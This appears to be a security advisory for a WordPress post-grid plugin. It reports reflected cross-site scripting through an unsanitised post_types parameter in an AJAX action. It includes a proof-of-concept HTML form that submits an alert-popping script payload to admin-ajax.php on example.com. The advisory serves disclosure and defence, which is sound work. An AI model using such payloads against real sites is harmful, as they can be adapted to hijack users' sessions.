The plugin does not sanitise and escape the post_types parameter before outputting it back in the response of the post_grid_update_taxonomies_terms_by_posttypes AJAX action, available to any authenticated users, leading to a Reflected Cross-Site Scripting
<html>
<form action="https://example.com/wp-admin/admin-ajax.php?action=post_grid_update_taxonomies_terms_by_posttypes" method="POST">
<input type="text" value="<html><img src onerror=alert(/XSS/)>" name="post_types">
<input type="submit" value="Send">
</form>
</html>